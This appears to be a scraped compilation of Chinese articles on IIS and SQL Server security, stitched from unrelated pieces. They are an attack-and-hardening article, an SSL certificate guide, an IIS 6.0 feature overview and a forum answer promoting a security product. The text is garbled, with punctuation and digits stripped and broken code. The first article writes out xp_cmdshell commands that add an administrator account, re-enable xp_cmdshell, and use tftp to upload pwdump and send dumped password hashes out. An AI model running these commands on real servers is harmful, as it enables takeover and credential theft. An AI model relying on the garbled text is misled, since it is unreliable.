IIS中SQL Server数据库的安全问题

　从codered到nimda等 一大堆蠕虫把原来需要人工利用的漏洞都变成了程序自动利用了 大家还想去手工操作这些IIS漏洞么让我们调整重心 去看看服务器常用的数据库吧

　一般网站都是基于数据库的 特别是ASP PHP JSP这样的用数据库来动态显示的网站 很多网站可能多注意的是操作系统的漏洞 但是对数据库和这些脚本的安全总是忽略 也没有太多注意

　从最比较普遍的脚本问题开始 这些都是老话题了 大家可以参考Hectic写的《关于数据库的简单入侵和无赖破坏 以天融信做例子》 该文章对从SQL脚本问题说得非常详细 对于脚本安全的解决 也可以通过过滤来实现 可以参考我以前写的 对于ASP来说 可以使用下面这个过滤函数:

Function Filter_SQL(strData) Dim strFilter Dim blnFlag Dim i strFilter= ; // @ _ exec declare 需要过滤的字符 可以自己添加 是分隔符

blnFlag=Flase 过滤标志 如果产生过滤 那么就是真 Dim arrayFilter arrayFilter=Split(strFilter ) For i= To UBound(arrayFilter) If Instr(strData arrayFilter(i))> Then blnFlag=True Exit For End If Next If blnFlag Then Response Redirect wrong asp 当发现有过滤操作时 导向一个预定页面 反正正常访问用不到的连接请求 总不是好事情 Else Filter_SQL=strData End If End Function  　　对于MS SQL Server数据库来说 安全问题不仅仅局限在脚本上了 天杀的微软的系统性很强 整个基于WINDOWS系统的应用都有很强的关联性 对SQL Server来说 基本可以把数据库管理和系统管理等同起来了 SQL Server默认的管理员帐号sa的密码是空的 这给多数NT服务器产生一个安全漏洞 小榕的SQLRCMD 就能够利用获得的数据库管理员帐号执行系统命令

　在SQL Server中有很多系统存储过程 有些是数据库内部使用的 还有一些就是通过执行存储过程来调用系统命令

　系统存储过程:xp_cmdshell 就是以操作系统命令行解释器的方式执行给定的命令字符串 它就具体语法是:xp_cmdshell

　{ mand_string } [ no_output]

　xp_cmdshell在默认情况下 只有 sysadmin 的成员才能执行 但是 sysadmin也可以授予其他用户这个执行权限 在早期版本中 获得 xp_cmdshell 执行权限的用户在 SQL Server 服务的用户帐户中运行命令 可以通过配置选项配置 SQL Server 以便对 SQL Server 无 sa 访问权限的用户能够在SQLExecutiveCmdExec Windows NT 帐户中运行 xp_cmdshell 在 SQL Server 中 该帐户称为 SQLAgentCmdExec 现在对于SQL Server 只要有一个能执行该存储过程的帐号就可以直接运行命令了

　对于 NT 和 WIN 当用户不是 sysadmin 组的成员时 xp_cmdshell 将模拟使用 xp_sqlagent_proxy_account 指定的 SQL Server 代理程序的代理帐户 如果代理帐户不能用 则 xp_cmdshell 将失败 所以即使有一个帐户是master数据库的db_owner 也不能执行这个存储过程

　如果我们有一个能执行xp_cmdshell的数据库帐号 比如是空口令的sa帐号 那么我们可以执行这样的命令:

　exec xp_cmdshell net user refdom /add

　exec xp_cmdshell net localgroup administrators refdom /add

　上面两次调用就在系统的管理员组中添加了一个用户:refdom

　当我们获得数据库的sa管理员帐号后 就应该可以完全控制这个机器了 可见数据库安全的重要性

　下面这些存储过程都是对Public可以执行的:

　xp_fileexist 用来确定一个文件是否存在

　xp_getfiledetails 可以获得文件详细资料

　xp_dirtree 可以展开你需要了解的目录 获得所有目录深度

　Xp_getnetname 可以获得服务器名称

　还有可以操作注册表的存储过程 这些不是对Public可以执行的 需要系统管理员或者授权执行:

　Xp_regaddmultistring

　Xp_regdeletekey

　Xp_regdeletevalue

　Xp_regenumvalues

　Xp_regread (对Public可以执行)

　Xp_regremovemultistring

　Xp_regwrite

　SQL Server的安全配置

　除跟着微软打满所有补丁外 还需要加强数据库的安全

　首先 你需要加强象sa这样的帐号的密码 跟系统帐号的使用配置相似 一般操作数据库不要使用象sa这样的最高权限的帐号 而使用能满足你的要求的一般帐号

　接着对扩展存储过程开始大屠杀 首先就是xp_cmdshell 还有就是上面那些一大堆存储过程 都drop吧 一般也用不着

　执行:

　use master

　sp_dropextendedproc xp_cmdshell

　去掉guest帐号 阻止非授权用户访问 去掉不必要的网络协议

　加强对数据库登陆的日志记录 最好记录所有登陆事件 可以用下面的简单DOS命令来查看日志:

　findstr /C: 登录 d:\Microsoft SQL Server\MSSQL\LOG\

　用管理员帐号定期检查所有帐号 是否密码为空或者过于简单 比如下面的语句:

　Use master

　Select name Password from syslogins where password is null

　用下面语句对所有帐号 检查对存储过程和扩展存储过程的执行权 提防不必要的执行权限扩散:

　Use master

　Select sysobjects name From sysobjects sysprotects Where

　sysprotects uid = AND xtype IN ( X P ) AND sysobjects id =

　sysprotects id

　加强数据库的安全是非常重要的 有的数据库服务器是和WEB服务器隔离开的 这就同MAIL服务器一样 数据库的日志可能就基本很少去查看 这将会成为管理员的一个疏忽点 类似DNS MAIL等等 数据库服务器往往成为各种入侵的跳板

　下面是一些关于数据库的问答和技巧:

　 获得SA权限后 却不能执行xp_cmdshell存储过程怎么办

　答:可能是已经把xp_cmdshell等扩展存储过程删除了 可以用这个存储过程把xp_cmdshell恢复

　sp_addextendedproc xp_cmdshell xpsql dll

　 通过数据库用pwdump获得系统管理员密码

　先上传一个pwdump

　tftp i GET pwdump exe pwdump exe

　tftp i GET lsaext dll lsaext dll

　tftp i GET pwservice exe pwservice exe

　pwdump outfile txt

　tftp PUT outfile txt outfile txt

　然后再用解密工具l pht等等破解这些密码

　 从数据库读取系统管理员密码

　能读出加密的密码是NT的 administrator 帐号也不能做的 SQL Server能读出来是使用的LocalSystem帐号 这个帐号比administrator更高一级 可以使用下面这个存储过程 不过读出来的密码是经过加密后的 然后再解密吧

　xp_regread

lishixinzhi/Article/program/SQLServer/201311/22471

随着Windows Server 2003操作系统的推出，Windows平台的安全性和易用性大大增强，然而，在默认情况下，IIS使用HTTP协议以明文形式传输数据，没有采取任何加密措施，用户的重要数据很容易被窃取，如何才能保护局域网中的这些重要数据呢下面笔者就介绍一下如何使用SSL增强IIS服务器的通信安全。

一、什么是SSL

SSL（Security Socket Layer）全称是加密套接字协议层，它位于HTTP协议层和TCP协议层之间，用于建立用户与服务器之间的加密通信，确保所传递信息的安全性，同时SSL安全机制是依靠数字证书来实现的。

SSL基于公用密钥和私人密钥，用户使用公用密钥来加密数据，但解密数据必须使用相应的私人密钥。使用SSL安全机制的通信过程如下：用户与IIS服务器建立连接后，服务器会把数字证书与公用密钥发送给用户，用户端生成会话密钥，并用公共密钥对会话密钥进行加密，然后传递给服务器，服务器端用私人密钥进行解密，这样，用户端和服务器端就建立了一条安全通道，只有SSL允许的用户才能与IIS服务器进行通信。

提示：SSL网站不同于一般的Web站点，它使用的是“HTTPS”协议，而不是普通的“HTTP”协议。因此它的URL（统一资源定位器）格式为“https://网站域名”。

二、安装证书服务

要想使用SSL安全机制功能，首先必须为Windows Server 2003系统安装证书服务。

进入“控制面板”，运行“添加或删除程序”，接着进入“Windows组件向导”对话框，勾选“证书服务”选项，点击“下一步”按钮，接着选择CA类型。这里选择“独立根CA”，点击“下一步”按钮，为自己的CA服务器取个名字，设置证书的有效期限，最后指定证书数据库和证书数据库日志的位置，就可完成证书服务的安装。

三、配置SSL网站

1创建请求证书文件

完成了证书服务的安装后，就可以为要使用SSL安全机制的网站创建请求证书文件。点击“控制面板→管理工具”，运行“Internet 信息服务-IIS 管理器”，在管理器窗口中展开“网站”目录，右键点击要使用SSL的网站，选择“属性”选项，在网站属性对话框中切换到“目录安全性”标签页（图1），然后点击“服务器证书”按钮。在“IIS证书向导”对话框中选择“新建证书”，点击“下一步”按钮，选择“现在准备证书请求，但稍后发送”。在“名称”输入框中为该证书取名，然后在“位长”下拉列表中选择密钥的位长。接着设置证书的单位、部门、站点公用名称和地理信息，最后指定请求证书文件的保存位置。这样就完成了请求证书文件的创建。

2申请服务器证书

完成上述设置后，还要把创建的请求证书文件提交给证书服务器。在服务器端的IE浏览器地址栏中输入“/CertSrv/defaultasp”。在“Microsoft 证书服务”欢迎窗口中点击“申请一个证书”链接，接下来在证书申请类型中点击“高级证书申请”链接，然后在高级证书申请窗口中点击“使用BASE64编码的CMC或PKCS#10”链接，再打开刚刚生成的“certreqtxt”文件，将其中的内容复制到“保存的申请”输入框后点击“提交”按钮即可。

3颁发服务器证书

点击“控制面板→管理工具”，运行“证书颁发机构”。在主窗口中展开树状目录，点击“挂起的申请”项（图2），找到刚才申请的证书，然后右键点击该项，选择“所有任务→颁发”。颁发成功后，点击树状目录中的“颁发的证书”项，双击刚才颁发的证书，在弹出的“证书”对话框的“详细信息”标签页中，点击“复制到文件”按钮，弹出证书导出向导，连续点击“下一步”按钮，并在“要导出的文件”对话框中指定文件名，最后点击“完成”。

4安装服务器证书

重新进入IIS管理器的“目录安全性”标签页，点击“服务器证书”按钮，弹出“挂起的证书请求”对话框，选择“处理挂起的请求并安装证书”选项，点击“下一步”按钮，指定刚才导出的服务器证书文件的位置，接着设置SSL端口，使用默认的“443”即可，最后点击“完成”按钮。

可以参照WIN2K来设置:

下面，我就介绍一下如何在Windows2000server/NET中开启CA服务。

1、首先请确认您的服务器已经安装配置了Active Directory服务，这样您就可以给域中的用户颁发数字证书。当然AD服务不是安装CA服务的必要条件，如果仅仅左测试使用，您可以不安装AD服务；

2、确保在您的Windows2000server/NET中开启IIS服务，并且支持ASP，这样您的CA服务可以通过WEB在INTERNET/INTRANET发布；

3、开始-->设置-->控制面板-->添加/删除程序-->添加/删除Windows组件-->选中证书服务；

4、然后选择合适的CA类型，这里我们选择独立的根CA；

5、如果你要改变微软的默认密钥设置，你可以选中高级选项；一般，我们直接进入下一步；

6、在这里输入您这个CA的详细信息；

7、然后指定存储配置数据、数据库和日志的位置；

8、完成安装向导，系统开始安装CA服务；

然后，您可以通过如下方式访问认证服务器：

http://安装认证服务器IP地址/certsrv

在这里，您可以申请一张证书，查看证书请求状态还有下载根证书。

当您完成证书申请之后，您可以通过打开IE-->工具-->INTERNET选项-->内容-->证书-->个人查看您个人证书。

当然你也可以通过把证书服务加入到MMC来进行证书服务管理，方法如下：

开始-->运行-->mmc-->文件-->添加/删除插件-->添加-->证书

）。单击"下一步"。

8在名字和安全设置对话框中，接受缺省选项。单击"下一步"。

9在下一个页面上， 输入您的信息，单击"下一步"。

10在"通用名"文本框中输入您的服务器名字。它可以是DNS名、NetBIOS名称或LOCALHOST。输入您的选择，单击"下一步"。

11在下一个页面上，输入您的信息，单击"下一步"。

12如果在域里面已经有了企业CA，并且您可以从那里申请到Web服务器证书，那么您将可以看到它列在那里。

（如果没有CA，如果CA没有配置成可以发布Web服务器证书，或如果您没有权限申请一个Web服务器证书，列表将会是空的。您必须有一个CA来完成这个部分。）选择您要使用的CA，单击"下一步"。

13就会出现证书请求提交页面。单击"下一步"。

14单击"完成"。现在服务器就有了一个WEB服务器证书。

15您将注意到在"安全通信"下面的"编辑"可以使用了，单击"编辑"。

16进入安全通信对话框，在需要安全通道（SSL）前打上勾。

17如果你希望以后客户端浏览器和WEB通信的时候需要128位对称加密，那么你就在需要128位加密前打上勾。

18在客户端证书中有三种选择：忽略客户证书、接收客户证书和申请客户证书。选择第一第二种仅仅是开启SSL单向认证，选择第三种着开启SSL双向认证。

19选择"接受客户端证书"，"接受客户端证书"设置需要在客户端证书和浏览器之间进行协商。您也必须选中"申请安全通道（SSL）"选项框。如果失败了，它不允许退回到另一个验证方法。需要安全通道意味着Web站点将不能通过HTTP协议进行访问，只可以通过HTTPS协议进行访问。单击"确定"。单击"应用"并且单击"确定"。

20单击确定，好了，您的SSL通道开启了。

以后你就可以通过https访问WEB服务了。

1、来自服务器本身及网络环境的安全，这包括服务器系统漏洞，系统权限，网络环境（如ARP等）、网络端口管理等，这个是基础。

2、来自WEB服务器应用的安全，IIS或者Apache等，本身的配置、权限等，这个直接影响访问网站的效率和结果。

3、网站程序的安全，这可能程序漏洞，程序的权限审核，以及执行的效率，这个是WEB安全中占比例非常高的一部分。

4、WEB Server周边应用的安全，一台WEB服务器通常不是独立存在的，可能其它的应用服务器会影响到WEB服务器的安全，如数据库服务、FTP服务等。

这只是大概说了一下，关于WEB应用服务器的安全从来都不是一个独立存在的问题。

优点

IIS 60 和 Windows Server 2003在网络应用服务器的管理、可用性、可靠性、安全性、性能与可扩展性方面提供了许多新的功能。IIS 60同样增强了网络应用的开发与国际性支持。IIS 60和 Windows Server 2003提供了最可靠的、高效的、连接的、完整的网络服务器解决方案。

特点 描述

可靠性与可伸缩性 IIS 60提供了更智能的、更可靠的Web服务器环境，新的环境包括应用程序健康监测、应用程序自动地循环利用。其可靠的性能提高了网络服务的可用性并且节省了管理员用于重新启动网络服务所花费的时间，IIS 60将提供最佳的扩展性和强大的性能从而充分发挥每一台Web服务器的最大功效。

更安全、易于管理 IIS 60在安全与管理方面做出了重大的改进。安全性能的增强包括技术与需求处理变化两方面。另外，增强了在安全方面的认证和授权。IIS 60的默认安装是被全面锁定的，这意味着默认系统的安全系数就被设为最大，它提供的增强的管理性能改善了XML metabase的管理及新的命令行工具。

服务器合并 IIS 60是一个具有高伸缩性的Web服务器，它为Web服务器的合并提供了新的机遇。通过将可靠的体系结构和内核模式驱动程序完美结合在一起，IIS 60允许您在单台服务器上托管更多的应用程序。服务器合并还可以降低企业与人工、硬件以及站点管理相关的成本。

增强的开发与国际化支持 通过Windows Server 2003 与IIS 60支持的先进功能如内核模式缓存，应用程序开发人员将从Windows Server 2003 与IIS 60 单一的、完整的应用平台环境中受益。基于IIS 60，Windows Server 2003为开发者提供高标准的附加功能，包括快速应用程序开发以及广泛的语言选择，同时也提供了国际化支持和支持最新的Web标准。

更高的安全性 IIS 60显著改进了Web服务器的安全性。IIS 60在默认情况下处于锁定状态，从而减少了暴露在攻击者面前的攻击表面积。此外，IIS 60的身份验证和授权功能也得到了改进。IIS 60还提供了更多更强大的管理功能，改善了对XML元数据库（metabase）的管理，并且提供了新的命令行工具。IIS 60在降低系统管理成本的同时，大大提高了信息系统的安全性。

Web服务器更高的可靠性和可用性

IIS 60已经经过了广泛的重新设计，以提高Web服务器的可靠性和可用性。新的容错进程架构和其它功能特性可以帮助用户减少不必要的停机时间，并提高应用程序的可用性。

功能特性 描述

容错进程架构 IIS 60的容错式进程架构将Web站点和应用程序隔离到一个自包含的单元之中（又称应用程序池）。应用程序池为管理员管理一组Web站点和应用程序提供了便利，同时提高了系统的可靠性，因为一个应用程序池中的错误不会引起另外一个应用程序池或者服务器本身发生故障。

健康状况监视 IIS 60定期检查应用程序池的状态，并自动重新启动应用程序池中发生故障的Web站点或应用程序，从而提高了应用程序的可用性。通过自动禁用在短时间内频繁发生故障的Web站点和应用程序，IIS 60可以保护服务器和其它应用程序的安全。

自动进程回收 IIS 60可以根据一组灵活的标准和条件——例如CPU利用率和内存占用情况，自动停止和重新启动发生故障的Web站点和应用程序，同时将请求放入队列。IIS 60还可以在回收一个工作进程时对客户机的TCP/IP连接加以维护，将Web服务客户端应用程序与后端不稳定的Web应用程序隔离开来。

快速的故障保护 如果某个应用程序在短时间内频繁发生故障，IIS 60将自动禁用该程序，并且向所有新发出和排入队列的针对该应用程序的请求返回一个“503服务不可用”错误信息。例如，此外，还可以触发某些定制操作，例如触发一个调试操作或者向管理员发出通知。快速故障保护可以保护Web服务器免遭拒绝服务攻击。

更加轻松的服务器管理

借助IIS 60，Web基础结构的管理工作变得比以往更加轻松和灵活，从而为企业节约IT管理成本带来了新的机遇。

功能特性 描述

基于XML的配置文件 IIS 60中XML格式的纯文本元数据库（metabase）为发生故障的服务器带来了经过改进的备份和恢复功能。此外，它还提供了得到改进的故障处理和元数据库损坏恢复。使用常见的文本编辑工具对其进行直接编辑提供了更为出色的可管理性。

运行程序的同时对其进行编辑 在服务器保持运行的同时，IIS 60允许管理员对服务器配置做出各种修改。例如，管理员可以使用该特性添加一个新的站点，创建虚拟目录，或者修改应用程序池和工作进程的配置——所有这些都是在IIS 60继续处理请求的同时发生的，并且无需进行重新编译或者重新启动服务器。

基于命令行和脚本的管理 IIS 60的管理员可以使用Windows Server 2003的命令行工具完成很多常见的管理工作。利用一个简单的命令，管理员即可管理多个本地或远程计算机。IIS 60还提供了一个完整的脚本环境，以在不使用图形用户界面的情况下，从命令行自动完成多种常见的管理任务。

对WMI的支持 IIS 60全面支持Windows Management Instrumentation（Windows管理规范，WMI）， Web管理员可以通过它获取重要的企业管理数据，例如性能计数器和配置文件。WMI的接口从本质上说类似于继续享受支持的Microsoft Active Directory® Service Interfaces（ADSI），可以在管理脚本中使用，并且可以用来修改基于XML的配置元数据库。

服务器合并

和先前版本相比，IIS 60的性能已经得到了极大的提高，现在，单台服务器即可托管更多的站点和应用程序。

功能特性 描述

站点伸缩性 IIS 60改进了操作系统使用内部资源的方法。例如，在初始化过程中，IIS 60不会预先分配资源。通过运行IIS 60，您可以在单台服务器上管理更多的站点和并发执行更多的工作进程。和IIS的先前版本相比，服务器的启动和关闭过程更加快捷。所有这些改进都使得IIS 60能够以更大的伸缩性对站点进行管理

新的内核模式驱动程序，HTTPsys Windows Server 2003引入了一种新的内核模式驱动程序，即HTTP协议堆栈（HTTPsys），并使用它进行HTTP的解析和缓存，从而大大提高了系统的伸缩性和性能表现。IIS 60便建立在HTTPsys的基础之上，并且针对提高Web服务器的吞吐量这一目的进行了特别的优化和调整。

Web园 IIS 60的工作进程隔离模式还允许多个工作进程被配置到针对某个给定应用程序池的服务请求上，这种配置又被称作Web园（Web garden）。

处理器关联 如果设置了处理器关联，IIS 60的工作进程便可以运行在指定的 微处理器或CPU上。处理器关联还可以和运行在多处理器计算机之上的Web园配合使用，在这些计算机上，CPU群集专门共指定的应用程序池使用。

更快捷的应用程序开发

通过提供一组全面完善的集成化应用程序服务和领先于业界的工具，Windows Server 2003应用程序环境大大改善了开发人员的工作效率和生产力。

功能特性 描述

ASPNET和IIS的集成 通过将ASPNET和IIS集成在一起，Windows Server 2003提供了更为美妙的开发体验。Windows Server 2003的各种增强建立在IIS 60的基础之上，为开发人员提供了高水平的功能特性，例如快速应用程序开发（RAD）和广泛灵活的语言选择。在Windows Server 2003中，使用ASPNET和NET Framework的得到了进一步优化，因为用来处理请求的体系架构与IIS 60紧密集成在一起。

Microsoft NET Framework Microsoft NET Framework允许开发人员在ASPNET和其它技术的帮助下创建优秀的Web应用程序。此外，它还可以帮助他们开发与他们目前正在设计和开发的应用程序完全相同的程序。NET Framework和语言无关；实际上您可以使用任何语言为它开发程序。开发人员可以使用各种语言构建基于NET的应用程序和服务，包括： Microsoft Visual C++® NET、Visual Basic® NET、JScript®以及Visual C# NET。

XML Web 服务 IIS 60提供了一个高性能的XML Web服务平台。XML Web服务为用户远程访问服务器功能提供了手段。通过使用Web服务，企业可以将编程接口暴露给他们的数据或业务逻辑，也可以通过客户端和服务器应用程序获得和操纵这些数据和业务逻辑。

跨越组织地理边界的信息共享 跨越组织的地理边界使用各种语言进行信息共享正在经济全球化浪潮中发挥越来越大的作用。过去，HTTP协议的非Unicode结构将开发人员限制在系统代码页上。现在，利用经过UTF-8（UCS Transformation Format 8）编码的URL ，Unicode成为了可能，它带来的好处之一便是：人们可以支持更复杂的语言了，例如中文。IIS 60允许用户使用Unicode访问服务器变量。此外，它还添加了新的服务器支持函数，允许开发人员访问以Unicode形式表述的URL地址，因此改善了产品的国际化支持能力。

更高的安全性

IIS 60远比IIS 4x 或 IIS 5x安全，它拥有很多新的功能特性，能够大大提高您的Web基础结构的安全性。此外，在默认状况下，IIS 60即处于“锁定”状态，同时具有最为可靠的超时设置和内容限制。

功能特性 描述

锁定服务器 IIS 60在安全性方面进行了很大的加强。为了减少系统向外界暴露的攻击表面积，IIS 60默认情况下不会安装在Windows Server 2003之中——管理员必须明确地选择该组件并安装它。IIS 60缺省即处于锁定状态下，并仅仅能够为用户提供静态内容。通过使用Web服务扩展节点，Web站点的管理员可以根据组织的特殊需要，启用或禁用某些IIS功能。

Web服务扩展列表 默认情况下的IIS安装不会编译、执行或者提交任何动态页面。为了向用户提供这些文件，您必须在Web服务扩展列表中添加每个允许提交的文件扩展名。这种做法可以防止某些人调用一些不够安全的动态页面。

默认的低权限账户 所有IIS 60的工作进程默认情况下都使用“网络服务”用户账户运行，这个在Windows Server 2003中新增加的账户类型是一种拥有有限操作系统权限的内置账户。所有的ASP内置功能都使用低权限账户（匿名用户）在系统中运行。

授权 IIS 60对Windows Server 2003内置的新的授权框架进行了进一步的扩展。此外，Web应用程序可以使用URL授权——以及授权管理器（Authorization Manager）——对用户的访问加以控制。现在，受约束的委派授权使得域管理员只能向特定的计算机和服务进行委派操作。

总结

IIS 60 与Windows Server 2003为网络应用服务器的管理提供了许多新的特性，包括实用性、可靠性、安全性与可扩展性。IIS 60也增强了开发和国际化支持，Windows Server 2003和IIS 60为您提供了一整套最可靠、高效、连接的一体化网络应用解决方案。

楼上说的对，但我想你问的不是外网访问局域网的问题吧？

进路由设置MAC地址过滤吧。这样比较简单也容易弄。

如果是IIS服务器的话，就需要点专业知识了。看看百度老师怎么说的吧：

搭建IIS服务器应该注意的安全问题 1iis安全设置之安装系统补丁。对于服务器来说就特别重要，因为安全补丁关乎到系统安全，而微软网站经常发布最新的系统安全补丁，可以用系统自带的windows update程序随时更新。 2iis安全设置之FTP目录的设定。FTP目录没有设置也容易被别人攻击，一般的就是将主目录指定到逻辑盘。为了安全，要对每个目录按不同的用户设置不同的访问权限，然后关闭一些不需要的服务，这样可以对不良人士利用IIS溢出漏洞访问到系统盘作个第一级防护。 3iis安全设置之端口设置。IIS有默认的端口设置，只要稍有计算机知识的人都会记得这些端口的，要破解的话就十分的方便，所以尽量不要使用21这个默认端口号，并启用日志，以便FTP服务出现异常时检查。

编辑本段对IIS服务的远程管理

三、对IIS服务的远程管理 1．在“管理Web站点”上单击右键，选“属性”，再进入“Web站点”窗口，选择好“IP地址”。 2．转到“目录安全性”窗口，单击“IP地址及域名限制”下的“编辑”按钮，点选中“授权访问”以能接受客户端从本机之外的地方对IIS进行管理；最后单击“确定”按钮。 3．则在任意计算机的浏览器中输入如“http://19216801:80”（80为其端口号）的格式后，将会出现一个密码询问窗口，输入管理员帐号名（Administrator）和相应密码之后就可登录成功，现在就可以在浏览器中对IIS进行远程管理了！在这里可以管理的范围主要包括对Web站点和FTP站点进行的新建、修改、启动、停止和删除等操作。

服务器的安全设置很重要，所以相对也会很繁琐，需要进行的操作有很多：

系统漏洞扫描与修复；管理员账号、来宾账号、普通账号、影子账号的优化保护系

统不被黑客恶意添加或修改；对IIS下的ASP、ASPX网站相关的EXE和DLL文件进行保护操作防止网站被恶意上传和特殊权限的运行；对系统文件夹下

的关键二进制文件进行保护操作，确保存储的DLL文件和以及其他用于支持、配置或操作的文件的安全；对系统文件夹下的文件进行保护操作，防止系统文件被修

改，以确保系统的正常运行；对用户配置信息的文件夹进行保护操作，以防止用户当前桌面环境、应用程序设置和个人数据信息的泄露；对数据库进行权限优化以及

安全加固；停止了类似Remote Registry（远程修改注册表服务） Remote Desktop Help Session

Manager（远程协助服务）

这种不必要的服务，以防被黑客利用，降低安全隐患；关闭135和445这类用于远程过程调用，局域网中轻松访问各种共享文件夹或共享打印机的端口；禁止掉

ICP空连接功能，以防止连接者与目标主机建立无需用户名与密码的空连接造成的风险出现；配置backlog，提高网络并发性及网络的处理能力；优化设置

SYN-ACK等待时间，检查无效网关用以提高网络性能；检查TCPIP协议栈IGMP堆栈溢出本地拒绝服务、检查ICMP重定向报文，并进行优化操作，

防止被用于攻击；禁止路由发现功能，用以防止ICMP路由通告报文带来的增加路由表纪录的攻击；限制处于TIME_WAIT状态的最长时间，使运行的应用

程序可以更快速地释放和创建连接；卸载掉wshomocx组件和shell32dll组件，防止默认允许asp运行、exe可执行文件带来的安全隐

患；禁止掉系统自动启动服务器共享的功能，用以防止服务器上的资源被共享功能泄露出去。

在手动配置的同时也可以使用安装相应的服务器安全防御软件：安全狗。

服务器安全狗主要保护服务器免遭恶意攻击，包括DDOS、ARP防火墙、远程桌面守护、端口保护、网络监控等。

网站安全狗主要保护服务器上网站的安全，包括网马挂马扫描、SQL注入防护，CC攻击防护，资源保护等。

两者防护方向不同。建议结合使用可以让保护更全面。

请采纳！谢谢！